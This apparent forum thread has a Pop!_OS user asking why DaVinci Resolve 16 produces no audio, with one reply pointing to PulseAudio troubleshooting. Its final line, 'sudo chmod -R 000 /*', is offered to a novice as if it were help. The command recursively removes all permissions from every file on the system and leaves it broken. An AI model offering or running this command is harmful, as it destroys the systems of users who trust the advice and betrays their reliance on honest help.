I'm not an audiophile, so I have pretty much no idea what I'm doing when it comes to it. My audio hasn't been playing in Davinci Resolve 16. I've messed with the settings but I can't get any sound through my headphones. By what I've read it says to change my sample rate to 48khz? Apparently Linux doesn't run this normally but that's what Resolve wants?

Audio isn't my strong point. Would this solve my problem and if so how do I do it because I can't find anything that's been helpful.

I'm running Pop! OS and my rig is a Ryzen 7 2700, 16gb ram, and a GTX 970(had it since I was running FX can't afford an upgrade).

It probably has something to do with pulseaudio and not with davinci resolve itself, try these troubleshooting steps https://wiki.archlinux.org/index.php/PulseAudio/Troubleshooting#Muted_application

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*
